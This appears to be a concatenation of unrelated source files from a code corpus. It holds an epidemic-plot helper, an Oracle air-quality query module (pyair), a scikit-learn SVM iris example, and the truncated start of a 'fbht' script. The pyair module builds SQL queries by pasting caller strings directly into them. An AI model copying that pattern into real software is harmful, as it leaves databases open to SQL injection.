viral_suppression = StatInfoEntry(label = 'Viral\nsupression',
percent = True),
new_infections = StatInfoEntry(label = 'Cumulative\nincidence'),
)
def get_stat_info(stat):
try:
return copy.copy(_stat_info[stat])
except KeyError:
return StatInfoEntry(label = stat.capitalize())
def _none_func():
def f(*args, **kwargs):
return None
return f
def data_infected_getter(parameters):
return parameters.prevalence * parameters.population
# Everything not listed returns 'None', indicating no data.
data_hist_getter = collections.defaultdict(
_none_func,
infected = data_infected_getter,
prevalence = operator.attrgetter('prevalence'),
incidence_per_capita = operator.attrgetter('incidence_per_capita'),
drug_coverage = operator.attrgetter('drug_coverage')
)
class DataGetter(dict):
def __init__(self):
self['drug_coverage'] = operator.attrgetter('proportions.treated')
self['viral_suppress'] = self.viral_suppression_getter
def __getitem__(self, key):
try:
super().__getitem__(key)
except KeyError:
# Default: return a attrgetter on 'key'.
return operator.attrgetter(key)
@staticmethod
def viral_suppression_getter(results):
return (results.viral_suppression / results.infected)
data_getter = DataGetter()
def format_axes(ax, country, info,
country_label, stat_label,
country_short_name = True,
plot_hist = False,
tick_interval = 10,
space_to_newline = False):
'''
Do common formatting.
'''
if plot_hist:
a = historical_data_start_year
else:
a = int(numpy.floor(t[0]))
b = int(numpy.ceil(t[-1]))
ticks = range(a, b, tick_interval)
if ((b - a) % tick_interval) == 0:
ticks = list(ticks) + [b]
ax.set_xticks(ticks)
ax.set_xlim(a, b)
a, b = ax.get_ylim()
if a < 0:
ax.set_ylim(0, b)
ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins = 5))
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useOffset = False))
ax.yaxis.set_major_formatter(UnitsFormatter(info.units))
# One minor tick between major ticks.
# ax.xaxis.set_minor_locator(ticker.AutoMinorLocator(2))
# ax.yaxis.set_minor_locator(ticker.AutoMinorLocator(2))
if country_short_name:
country = get_country_short_name(country)
if space_to_newline:
country = country.replace(' ', '\n')
ylabel = None
title = None
if country_label == 'ylabel':
ylabel = country
elif country_label == 'title':
title = country
if stat_label == 'ylabel':
ylabel = info.label
elif stat_label == 'title':
title = info.label
if ylabel is not None:
ax.set_ylabel(ylabel, va = 'baseline', ha = 'center')
if title is not None:
title_ = ax.set_title(title, va = 'center', ha = 'center')
title_.set_y(1.07)
def _get_title(filename):
base, _ = os.path.splitext(os.path.basename(filename))
title = base.replace('_', ' ').capitalize()
return title
def _has_bin(binname):
'''
Test if a binary is present on the system.
'''
cp = subprocess.run(['which',binname], stdout = subprocess.PIPE)
return (cp.returncode == 0)
def pdf_add_info(filename, **kwargs):
'''
Use pdftk to set PDF metadata.
'''
if _has_bin('pdftk'):
if 'Author' not in kwargs:
kwargs['Author'] = author
if 'Title' not in kwargs:
kwargs['Title'] = _get_title(filename)
curtime = time.strftime('D:%Y%m%d%H%M%S')
for key in ['CreationDate', 'ModDate']:
if key not in kwargs:
kwargs[key] = curtime
# Build info in pdftk's required format.
def build_info_item(key, value):
return 'InfoBegin\nInfoKey: {}\nInfoValue: {}'.format(key, value)
infostr = '\n'.join(build_info_item(k, v) for (k, v) in kwargs.items())
# pdftk will write to a tempfile, then we'll replace to original file
# with the tempfile
tempfd, tempname = tempfile.mkstemp()
args = ['pdftk', filename, 'update_info_utf8', '-', 'output', tempname]
cp = subprocess.run(args, input = infostr.encode('utf-8'))
cp.check_returncode() # Make sure it succeeded.
st = os.stat(filename) # To preserve permissions
os.replace(tempname, filename)
os.chmod(filename, st.st_mode) # Set permissions
else:
raise RuntimeWarning("'pdftk' not found. PDF info not added.")
def pdfoptimize(filename):
if _has_bin('pdftocairo'):
tempfd, tempname = tempfile.mkstemp()
args = ['pdftocairo', '-pdf', filename, tempname]
print('Optimizing {}.'.format(filename))
cp = subprocess.run(args)
cp.check_returncode() # Make sure it succeeded.
st = os.stat(filename) # To preserve permissions
os.replace(tempname, filename)
os.chmod(filename, st.st_mode) # Set permissions
else:
raise RuntimeWarning("'pdftocairo' not found. PDF not optimized.")
_keymap = {'Author': 'Artist',
'Title': 'ImageDescription'}
def image_add_info(filename, **kwargs):
if 'Author' not in kwargs:
kwargs['Author'] = author
if 'Title' not in kwargs:
kwargs['Title'] = _get_title(filename)
im = Image.open(filename)
format_ = im.format
if format_ == 'TIFF':
from PIL import TiffImagePlugin
info = dict(im.tag_v2)
for (key, value) in kwargs.items():
# Convert to TIFF tag names.
tagname = _keymap.get(key, key)
# Get tag ID number.
tagid = getattr(TiffImagePlugin, tagname.upper())
info[tagid] = value
# Drop alpha channel.
# im = im.convert('RGB')
im = im.convert('CMYK')
tempfd, tempname = tempfile.mkstemp()
im.save(tempname, format_,
tiffinfo = info,
compression = 'tiff_lzw')
st = os.stat(filename) # To preserve permissions
os.replace(tempname, filename)
os.chmod(filename, st.st_mode) # Set permissions
elif im.format == 'PNG':
from PIL import PngImagePlugin
info = PngImagePlugin.PngInfo()
for (key, value) in kwargs.items():
# Convert to TIFF tag names.
tagname = _keymap.get(key, key)
info.add_text(tagname, value)
tempfd, tempname = tempfile.mkstemp()
im.save(tempname, format_,
pnginfo = info,
optimize = True)
st = os.stat(filename) # To preserve permissions
os.replace(tempname, filename)
os.chmod(filename, st.st_mode) # Set permissions
im.close()
def savefig(fig, filename, title = None, **kwargs):
if title is None:
title = _get_title(filename)
info = dict(Author = author, Title = title)
if filename.endswith('.pdf'):
fig.savefig(filename, **kwargs)
# pdfoptimize(filename)
pdf_add_info(filename, **info)
elif filename.endswith('.pgf'):
fig.savefig(filename, **kwargs)
else:
if ('dpi' not in kwargs):
kwargs['dpi'] = 600
fig.savefig(filename, **kwargs)
# Use PIL etc to set metadata.
image_add_info(filename, **info)
| agpl-3.0 |
LionelR/pyair | pyair/xair.py | 1 | 25393 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
**Air Quality
Module de connexion et de récupération de données sur une base XAIR
"""
import cx_Oracle
import pandas as pd
import pandas.io.sql as psql
import datetime as dt
INVALID_CODES = ['C', 'D', 'I', 'M', 'Z', 'B', 'N', 'X', 'G', 'H']
MISSING_CODE = 'N'
def is_invalid(e):
"""Renvoie Vrai ou Faux suivant que e est dans la liste des codes invalides
Paramètres:
e: une lettre en majuscules
"""
return e in INVALID_CODES
def etats_to_invalid(etats):
"""
Transforme un dataframe de codes d'état en une grille d'invalidation.
Paramètres:
etats: dataframe de codes d'état, tel que retourné par get_mesure avec le
paramètre brut=True
Retourne:
Un dataframe de booléen. Chaque valeur est soit à False, et la mesure
correspondante (à la même position dans le dataframe de mesure) n'est pas
invalide, soit à True et la mesure est invalide.
"""
return etats.applymap(is_invalid)
def to_date(date, dayfirst=False, format=None):
"""
Transforme un champ date vers un objet python datetime
Paramètres:
date:
- si None, renvoie la date du jour
- si de type str, renvoie un objet python datetime
- si de type datetime, le retourne sans modification
dayfirst: Si True, aide l'analyse du champ date de type str en informant
le décrypteur que le jour se situe en début de chaîne (ex:11/09/2012
pourrait être interpreté comme le 09 novembre si dayfirst=False)
format: chaîne de caractère décrivant précisement le champ date de type
str. Voir la documentation officielle de python.datetime pour description
"""
## TODO: voir si pd.tseries.api ne peut pas remplacer tout ca
if not date:
return dt.datetime.fromordinal(
dt.date.today().toordinal()) # mieux que dt.datetime.now() car ca met les heures, minutes et secondes à zéro
elif isinstance(date, dt.datetime):
return date
elif isinstance(date, str):
return pd.to_datetime(date, dayfirst=dayfirst, format=format)
elif isinstance(date, dt.date):
return dt.datetime.fromordinal(date.toordinal())
else:
raise ValueError("Les dates doivent être de type None, str, datetime.date ou datetime.datetime")
def _format(noms):
"""
Formate une donnée d'entrée pour être exploitable dans les fonctions liste_*
et get_*.
Paramètres:
noms: chaîne de caractère, liste ou tuples de chaînes de caractères ou
pandas.Series de chaînes de caractères.
Retourne:
Une chaînes de caractères dont chaque élément est séparé du suivant par les
caractères ',' (simples quotes comprises)
"""
if isinstance(noms, (list, tuple, pd.Series)):
noms = ','.join(noms)
noms = noms.replace(",", "','")
return noms
def date_range(debut, fin, freq):
"""
Génère une liste de date en tenant compte des heures de début et fin d'une journée.
La date de début sera toujours calée à 0h, et celle de fin à 23h
Paramètres:
debut: datetime représentant la date de début
fin: datetime représentant la date de fin
freq: freq de temps. Valeurs possibles : T (minute), H (heure), D (jour),
M (mois), Y (année). Peux prendre des cycles, comme 15T pour 15 minutes
"""
debut_dt = debut.replace(hour=0, minute=0, second=0, microsecond=0)
fin_dt = fin.replace(hour=23, minute=59, second=0, microsecond=0)
if freq in ('M', 'A'): # Calle la fréquence sur le début de mois/année
freq += 'S'
debut_dt = debut_dt.replace(day=1, minute=0, second=0, microsecond=0)
fin_dt = fin_dt.replace(day=1, minute=0, second=0, microsecond=0)
dates_completes = pd.date_range(start=debut_dt, end=fin_dt, freq=freq)
return dates_completes
class XAIR:
"""Connexion et méthodes de récupération de données depuis une base XAIR.
Usage :
import pyair
xr=pyair.xair.XAIR(user, pwd, adr, port=1521, base='N')
xr.liste_stations()
mes=xr.liste_mesures(reseau='OZONE').MESURES
m=xr.get_mesure(mes=mes, debut="2009-01-01", fin="2009-12-31", freq='H')
m.describe()
"""
def __init__(self, user, pwd, adr, port=1521, base='N', initial_connect=True):
self._ORA_FULL = "{0}/{1}@{2}:{3}/{4}".format(user, pwd, adr, port, base)
if initial_connect:
self._connect()
def _connect(self):
"""
Connexion à la base XAIR
"""
try:
# On passe par Oracle Instant Client avec le TNS ORA_FULL
self.conn = cx_Oracle.connect(self._ORA_FULL)
self.cursor = self.conn.cursor()
print('XAIR: Connexion établie')
except cx_Oracle.Error as e:
print("Erreur: %s" % (e))
raise cx_Oracle.Error('Echec de connexion')
def reconnect(self):
self._connect()
def disconnect(self):
"""
Fermeture de la connexion à la base
"""
self._close()
def _close(self):
self.cursor.close()
self.conn.close()
print('XAIR: Connexion fermée')
def liste_parametres(self, parametre=None):
"""
Liste des paramètres
Paramètres:
parametre: si fourni, retourne l'entrée pour ce parametre uniquement
"""
condition = ""
if parametre:
condition = "WHERE CCHIM='%s'" % parametre
_sql = """SELECT CCHIM AS PARAMETRE,
NCON AS LIBELLE,
NOPOL AS CODE
FROM NOM_MESURE %s ORDER BY CCHIM""" % condition
return psql.read_sql(_sql, self.conn)
def liste_mesures(self, reseau=None, station=None, parametre=None, mesure=None):
"""
Décrit les mesures:
- d'un ou des reseaux,
- d'une ou des stations,
- d'un ou des parametres
ou décrit une (des) mesures suivant son (leur) identifiant(s)
Chaque attribut peut être étendu en rajoutant des noms séparés par des
virgules ou en les mettant dans une liste/tuple/pandas.Series.
Ainsi pour avoir la liste des mesures en vitesse et direction de vent:
parametre="VV,DV" ou = ["VV", "DV"]
Les arguments sont combinés ensemble pour la sélection des mesures.
Paramètres:
reseau : nom du reseau dans lequel lister les mesures
station: nom de la station où lister les mesures
parametre: Code chimique du parametre à lister
mesure: nom de la mesure à décrire
"""
tbreseau = ""
conditions = []
if reseau:
reseau = _format(reseau)
tbreseau = """INNER JOIN RESEAUMES R USING (NOM_COURT_MES) """
conditions.append("""R.NOM_COURT_RES IN ('%s') """ % reseau)
if parametre:
parametre = _format(parametre)
conditions.append("""N.CCHIM IN ('%s')""" % parametre)
if station:
station = _format(station)
conditions.append("""S.IDENTIFIANT IN ('%s')""" % station)
if mesure:
mesure = _format(mesure)
conditions.append("""M.IDENTIFIANT IN ('%s')""" % mesure)
condition = "WHERE %s" % " and ".join(conditions) if conditions else ""
_sql = """SELECT
M.IDENTIFIANT AS MESURE,
M.NOM_MES AS LIBELLE,
M.UNITE AS UNITE,
S.IDENTIFIANT AS STATION,
N.CCHIM AS CODE_PARAM,
N.NCON AS PARAMETRE
FROM MESURE M
INNER JOIN NOM_MESURE N USING (NOPOL)
INNER JOIN STATION S USING (NOM_COURT_SIT)
%s
%s
ORDER BY M.IDENTIFIANT""" % (tbreseau, condition)
return psql.read_sql(_sql, self.conn)
def detail_df(self, df):
"""
Renvoie les caractéristiques des mesures d'un dataframe.
Paramètres:
df: dataframe à lister, tel que fournie par get_mesure()
Retourne:
Les mêmes informations que liste_mesure()
"""
return self.liste_mesures(mesure=df.columns.tolist())
def liste_stations(self, station=None, detail=False):
"""
Liste des stations
Paramètres:
station : un nom de station valide (si vide, liste toutes les stations)
detail : si True, affiche plus de détail sur la (les) station(s).
"""
condition = ""
if station:
station = _format(station)
condition = "WHERE IDENTIFIANT IN ('%s')" % station
select = ""
if detail:
select = """,
ISIT AS DESCRIPTION,
NO_TELEPHONE AS TELEPHONE,
ADRESSE_IP,
LONGI AS LONGITUDE,
LATI AS LATITUDE,
ALTI AS ALTITUDE,
AXE AS ADR,
CODE_POSTAL AS CP,
FLAG_VALID AS VALID"""
_sql = """SELECT
NSIT AS NUMERO,
IDENTIFIANT AS STATION %s
FROM STATION
%s
ORDER BY NSIT""" % (select, condition)
return psql.read_sql(_sql, self.conn)
def liste_reseaux(self):
"""Liste des sous-réseaux de mesure"""
_sql = """SELECT
NOM_COURT_RES AS RESEAU,
NOM_RES AS LIBELLE
FROM RESEAUDEF ORDER BY NOM_COURT_RES"""
return psql.read_sql(_sql, self.conn)
def liste_campagnes(self, campagne=None):
"""
Liste des campagnes de mesure et des stations associées
Paramètres:
campagne: Si définie, liste des stations que pour cette campagne
"""
condition = ""
if campagne:
condition = "WHERE NOM_COURT_CM='%s' """ % campagne
_sql = """SELECT
NOM_COURT_CM AS CAMPAGNE,
IDENTIFIANT AS STATION,
LIBELLE AS LIBELLE_CM,
DATEDEB AS DEBUT,
DATEFIN AS FIN
FROM CAMPMES
INNER JOIN CAMPMES_STATION USING (NOM_COURT_CM)
INNER JOIN STATION USING (NOM_COURT_SIT)
%s ORDER BY DATEDEB DESC""" % condition
return psql.read_sql(_sql, self.conn)
def liste_reseaux_indices(self):
"""Liste des réseaux d'indices ATMO"""
_sql = """SELECT NOM_AGGLO AS GROUPE_ATMO, NOM_COURT_GRP FROM GROUPE_ATMO"""
return psql.read_sql(_sql, self.conn)
def liste_sites_prelevement(self):
"""Liste les sites de prélèvements manuels"""
_sql = """SELECT NSIT, LIBELLE FROM SITE_PRELEVEMENT ORDER BY NSIT"""
return psql.read_sql(_sql, self.conn)
def get_mesures(self, mes, debut=None, fin=None, freq='H', format=None,
dayfirst=False, brut=False):
"""
Récupération des données de mesure.
Paramètres:
mes: Un nom de mesure ou plusieurs séparées par des virgules, une liste
(list, tuple, pandas.Series) de noms
debut: Chaine de caractère ou objet datetime décrivant la date de début.
Défaut=date du jour
fin: Chaine de caractère ou objet datetime décrivant la date de fin.
Défaut=date de début
freq: fréquence de temps. '15T' | 'H' | 'D' | 'M' | 'A' (15T pour quart-horaire)
format: chaine de caractère décrivant le format des dates (ex:"%Y-%m-%d"
pour debut/fin="2013-01-28"). Appeler pyair.date.strtime_help() pour
obtenir la liste des codes possibles.
Defaut="%Y-%m-%d"
dayfirst: Si aucun format n'est fourni et que les dates sont des chaines
de caractères, aide le décrypteur à transformer la date en objet datetime
en spécifiant que les dates commencent par le jour (ex:11/09/2012
pourrait être interpreté comme le 09 novembre si dayfirst=False)
brut: si oui ou non renvoyer le dataframe brut, non invalidé, et les
codes d'état des mesures
Defaut=False
Retourne:
Un dataframe contenant toutes les mesures demandées.
Si brut=True, renvoie le dataframe des mesures brutes non invalidées et
le dataframe des codes d'états.
Le dataframe valide (net) peut être alors recalculé en faisant:
brut, etats = xr.get_mesure(..., brut=True)
invalides = etats_to_invalid(etats)
net = brut.mask(invalides)
"""
def create_index(index, freq):
"""
Nouvel index [id, date] avec date formaté suivant le pas de temps voulu
index: index de l'ancien dataframe, tel que [date à minuit, date à ajouter]
"""
decalage = 1 # sert à compenser l'aberration des temps qui veut qu'on marque sur la fin d'une période (ex: à 24h, la pollution de 23 à minuit)
if freq == 'T' or freq == '15T':
f = pd.tseries.offsets.Minute
decalage = 15
if freq == 'H':
f = pd.tseries.offsets.Hour
if freq == 'D':
f = pd.tseries.offsets.Day
if freq == 'M':
f = pd.tseries.offsets.MonthBegin
if freq == 'A':
f = pd.tseries.offsets.YearBegin
else:
f = pd.tseries.offsets.Hour
new_index = [date + f(int(delta) - decalage) for date, delta in index]
return new_index
# Reformatage du champ des noms de mesure
mes = _format(mes)
# Analyse des champs dates
debut = to_date(debut, dayfirst, format)
if not fin:
fin = debut
else:
fin = to_date(fin, dayfirst, format)
# La freq de temps Q n'existe pas, on passe d'abord par une fréquence 15 minutes
if freq in ('Q', 'T'):
freq = '15T'
# Sélection des champs et de la table en fonctions de la fréquence de temps souhaitée
if freq == '15T':
diviseur = 96
champ_val = ','.join(['Q_M%02i AS "%i"' % (x, x * 15) for x in range(1, diviseur + 1)])
champ_code = 'Q_ETATV'
table = 'JOURNALIER'
elif freq == 'H':
diviseur = 24
champ_val = ','.join(['H_M%02i AS "%i"' % (x, x) for x in range(1, diviseur + 1)])
champ_code = 'H_ETAT'
table = 'JOURNALIER'
elif freq == 'D':
diviseur = 1
champ_val = 'J_M01 AS "1"'
champ_code = 'J_ETAT'
table = 'JOURNALIER'
elif freq == 'M':
diviseur = 12
champ_val = ','.join(['M_M%02i AS "%i"' % (x, x) for x in range(1, diviseur + 1)])
champ_code = 'M_ETAT'
table = 'MOIS'
elif freq == 'A':
diviseur = 1
champ_val = 'A_M01 AS "1"'
champ_code = 'A_ETAT'
table = 'MOIS'
else:
raise ValueError("freq doit être T, H, D, M ou A")
if table == 'JOURNALIER':
champ_date = 'J_DATE'
debut_db = debut
fin_db = fin
else:
champ_date = 'M_DATE'
# Pour les freq='M' et 'A', la table contient toutes les valeurs sur une
# année entière. Pour ne pas perturber la récupération si on passait des
# dates en milieu d'année, on transforme les dates pour être calées en début
# et en fin d'année. Le recadrage se fera plus loin dans le code, lors du reindex
debut_db = debut.replace(month=1, day=1, hour=0, minute=0)
fin_db = fin.replace(month=12, day=31, hour=23, minute=0)
debut_db = debut_db.strftime("%Y-%m-%d")
fin_db = fin_db.strftime("%Y-%m-%d")
# Récupération des valeurs et codes d'états associés
_sql = """SELECT
IDENTIFIANT as "id",
{champ_date} as "date",
{champ_code} as "etat",
{champ_val}
FROM {table}
INNER JOIN MESURE USING (NOM_COURT_MES)
WHERE IDENTIFIANT IN ('{mes}')
AND {champ_date} BETWEEN TO_DATE('{debut}', 'YYYY-MM-DD') AND TO_DATE('{fin}', 'YYYY-MM-DD')
ORDER BY IDENTIFIANT, {champ_date} ASC""".format(champ_date=champ_date,
table=table,
champ_code=champ_code,
mes=mes,
champ_val=champ_val,
debut=debut_db,
fin=fin_db)
## TODO : A essayer quand la base sera en version 11g
# _sql = """SELECT *
# FROM ({selection})
# UNPIVOT (IDENTIFIANT FOR VAL IN ({champ_as}))""".format(selection=_sql,
# champ_date=champ_date,
# champ_as=champ_as)
# On recupere les valeurs depuis la freq dans une dataframe
rep = psql.read_sql(_sql, self.conn)
# On créait un multiindex pour manipuler plus facilement le dataframe
df = rep.set_index(['id', 'date'])
# Stack le dataframe pour mettre les colonnes en lignes, en supprimant la colonne des états
# puis on unstack suivant l'id pour avoir les polluants en colonnes
etats = df['etat']
df = df.drop('etat', axis=1)
df_stack = df.stack(dropna=False)
df = df_stack.unstack('id')
# Calcul d'un nouvel index avec les bonnes dates. L'index du df est
# formé du champ date à minuit, et des noms des champs de valeurs
# qui sont aliassés de 1 à 24 pour les heures, ... voir champ_val.
# On aggrève alors ces 2 valeurs pour avoir des dates alignées qu'on utilise alors comme index final
index = create_index(df.index, freq)
df.reset_index(inplace=True, drop=True)
df['date'] = index
df = df.set_index(['date'])
# Traitement des codes d'état
# On concatène les codes d'état pour chaque polluant
# etats = etats.sum(level=0)
# etats = pd.DataFrame(zip(*etats.apply(list)))
etats = etats.unstack('id')
etats.fillna(value=MISSING_CODE * diviseur, inplace=True)
etats = etats.sum(axis=0)
etats = pd.DataFrame(list(zip(*etats.apply(list))))
etats.index = df.index
etats.columns = df.columns
# Remplacement des valeurs aux dates manquantes par des NaN
dates_completes = date_range(debut, fin, freq)
df = df.reindex(dates_completes)
etats = etats.reindex(dates_completes)
# Invalidation par codes d'état
# Pour chaque code d'état, regarde si oui ou non il est invalidant en le remplacant par un booléen
invalid = etats_to_invalid(etats)
if not brut:
# dans le dataframe, masque toute valeur invalide par NaN
dfn = df.mask(invalid) # DataFrame net
return dfn
else:
return df, etats
def get_manuelles(self, site, code_parametre, debut, fin, court=False):
"""
Recupération des mesures manuelles (labo) pour un site
site: numéro du site (voir fonction liste_sites_prelevement)
code_parametre: code ISO du paramètre à rechercher (C6H6=V4)
debut: date de début du premier prélèvement
fin: date de fin du dernier prélèvement
court: Renvoie un tableau au format court ou long (colonnes)
"""
condition = "WHERE MESLA.NOPOL='%s' " % code_parametre
condition += "AND SITMETH.NSIT=%s " % site
condition += "AND PRELEV.DATE_DEB>=TO_DATE('%s', 'YYYY-MM-DD') " % debut
condition += "AND PRELEV.DATE_FIN<=TO_DATE('%s', 'YYYY-MM-DD') " % fin
if court == False:
select = """SELECT
MESLA.LIBELLE AS MESURE,
METH.LIBELLE AS METHODE,
ANA.VALEUR AS VALEUR,
MESLA.UNITE AS UNITE,
ANA.CODE_QUALITE AS CODE_QUALITE,
ANA.DATE_ANA AS DATE_ANALYSE,
ANA.ID_LABO AS LABO,
PRELEV.DATE_DEB AS DEBUT,
PRELEV.DATE_FIN AS FIN,
ANA.COMMENTAIRE AS COMMENTAIRE,
SITE.LIBELLE AS SITE,
SITE.AXE AS ADRESSE,
COM.NOM_COMMUNE AS COMMUNE"""
else:
select = """SELECT
MESLA.LIBELLE AS MESURE,
ANA.VALEUR AS VALEUR,
MESLA.UNITE AS UNITE,
ANA.CODE_QUALITE AS CODE_QUALITE,
PRELEV.DATE_DEB AS DEBUT,
PRELEV.DATE_FIN AS FIN,
SITE.AXE AS ADRESSE,
COM.NOM_COMMUNE AS COMMUNE"""
_sql = """%s
FROM ANALYSE ANA
INNER JOIN PRELEVEMENT PRELEV ON (ANA.CODE_PRELEV=PRELEV.CODE_PRELEV AND ANA.CODE_SMP=PRELEV.CODE_SMP)
INNER JOIN MESURE_LABO MESLA ON (ANA.CODE_MES_LABO=MESLA.CODE_MES_LABO AND ANA.CODE_SMP=MESLA.CODE_SMP)
INNER JOIN SITE_METH_PRELEV SITMETH ON (ANA.CODE_SMP=SITMETH.CODE_SMP)
INNER JOIN METH_PRELEVEMENT METH ON (SITMETH.CODE_METH_P=METH.CODE_METH_P)
INNER JOIN SITE_PRELEVEMENT SITE ON (SITE.NSIT=SITMETH.NSIT)
INNER JOIN COMMUNE COM ON (COM.NINSEE=SITE.NINSEE)
%s
ORDER BY MESLA.NOPOL,MESLA.LIBELLE,PRELEV.DATE_DEB""" % (select, condition)
return psql.read_sql(_sql, self.conn)
def get_indices(self, res, debut, fin):
"""
Récupération des indices ATMO pour un réseau donné.
Paramètres:
res : Nom du ou des réseaux à chercher (str, list, pandas.Series)
debut: date de début, format YYYY-MM-JJ (str)
fin: Date de fin, format YYYY-MM-JJ (str)
"""
res = _format(res)
_sql = """SELECT
J_DATE AS "date",
NOM_AGGLO AS "reseau",
C_IND_CALCULE AS "indice"
FROM RESULTAT_INDICE
INNER JOIN GROUPE_ATMO USING (NOM_COURT_GRP)
WHERE NOM_AGGLO IN ('%s')
AND J_DATE BETWEEN TO_DATE('%s', 'YYYY-MM-DD') AND TO_DATE('%s', 'YYYY-MM-DD') """ % (res, debut, fin)
rep = psql.read_sql(_sql, self.conn)
df = rep.set_index(['reseau', 'date'])
df = df['indice']
df = df.unstack('reseau')
dates_completes = date_range(to_date(debut), to_date(fin), freq='D')
df = df.reindex(dates_completes)
return df
def get_indices_et_ssi(self, reseau, debut, fin, complet=True):
"""Renvoie l'indice et les sous_indices
complet: renvoyer les complets ou les prévus
reseau: nom du réseau à renvoyer
debut: date de début à renvoyer
fin: date de fin à renvoyer
Renvoi : reseau, date, Indice, sous_ind NO2,PM10,O3,SO2
"""
if complet:
i_str = "c_ind_diffuse"
ssi_str = "c_ss_indice"
else:
i_str = "p_ind_diffuse"
ssi_str = "p_ss_indice"
_sql = """SELECT
g.nom_agglo as "reseau",
i.j_date as "date",
max(case when i.{0}>0 then i.{0} else 0 end) indice,
max(case when n.cchim='NO2' then ssi.{1} else 0 end) no2,
max(case when n.cchim='PM10' then ssi.{1} else 0 end) pm10,
max(case when n.cchim='O3' then ssi.{1} else 0 end) o3,
max(case when n.cchim='SO2' then ssi.{1} else 0 end) so2
FROM resultat_indice i
INNER JOIN resultat_ss_indice ssi ON (i.nom_court_grp=ssi.nom_court_grp AND i.j_date=ssi.j_date)
INNER JOIN groupe_atmo g ON (i.nom_court_grp=g.nom_court_grp)
INNER JOIN nom_mesure n ON (ssi.nopol=n.nopol)
WHERE g.nom_agglo='{2}'
AND i.j_date BETWEEN
TO_DATE('{3}', 'YYYY-MM-DD') AND
TO_DATE('{4}', 'YYYY-MM-DD')
GROUP BY
g.nom_agglo,
i.j_date
ORDER BY i.j_date""".format(i_str, ssi_str, reseau, debut, fin)
df = psql.read_sql(_sql, self.conn)
df = df.set_index(['reseau', 'date'])
return df
def get_sqltext(self, format_=1):
"""retourne les requêtes actuellement lancées sur le serveur"""
if format_ == 1:
_sql = """SELECT u.sid, substr(u.username,1,12) user_name, s.sql_text
FROM v$sql s,v$session u
WHERE s.hash_value = u.sql_hash_value
AND sql_text NOT LIKE '%from v$sql s, v$session u%'
AND u.username NOT LIKE 'None'
ORDER BY u.sid"""
if format_ == 2:
_sql = """SELECT u.username, s.first_load_time, s.executions, s.sql_text
FROM dba_users u,v$sqlarea s
WHERE u.user_id=s.parsing_user_id
AND u.username LIKE 'LIONEL'
AND sql_text NOT LIKE '%FROM dba_users u,v$sqlarea s%'
ORDER BY s.first_load_time"""
return psql.read_sql(_sql, self.conn)
if __name__ == "__main__":
u = input("Enter your XAIR user name: ")
p = input("Enter your XAIR password: ")
a = input("Enter your XAIR database adress: ")
xr = XAIR(user=u, pwd=p, adr=a)
mes = xr.liste_mesures(reseau='OZONE').MESURE
a = xr.get_mesures(mes, '2012-01-01', fin='2012-12-31', freq='H', brut=False)
| mit |
ilo10/scikit-learn | examples/svm/plot_iris.py | 225 | 3252 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
datasets can help get an intuitive understanding of their respective
expressive power, be aware that those intuitions don't always generalize to
more realistic high-dimensional problems.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features. We could
# avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02 # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0 # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
# title for the plots
titles = ['SVC with linear kernel',
'LinearSVC (linear kernel)',
'SVC with RBF kernel',
'SVC with polynomial (degree 3) kernel']
for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
plt.subplot(2, 2, i + 1)
plt.subplots_adjust(wspace=0.4, hspace=0.4)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.xticks(())
plt.yticks(())
plt.title(titles[i])
plt.show()
| bsd-3-clause |
Loke155/fbht | mainFunc.py | 4 | 126869 | import sys,os
from platform import system
from getpass import getpass
from mainLib import *
import MyParser
from urllib import urlencode
import simplejson as json
import database
from time import time,ctime,sleep
import pickle
import re
from handlers import *
import signal
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import community
from networkx.drawing.nx_agraph import write_dot
from base64 import b64encode
import logging
from mechanize import Request
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import datetime
blocked = 0
masterCj = ''
def flush():
if system() == 'Linux':
sys.stdout.flush()
def setGlobalLogginng():
global globalLogging
globalLogging = not globalLogging
message = 'logging level set to %s' %globalLogging
logs(message)
raw_input(message + ' Press enter to continue')
def setMail():
email = raw_input("Enter the email: ")
password = getpass("Enter the Password: ")
return email, password
def login(email, password,state):
global blocked
cookieHandler = customCookies()
# Empty the cookies
cj.clear()
# Access the login page to get the forms
driver = webdriver.Firefox()
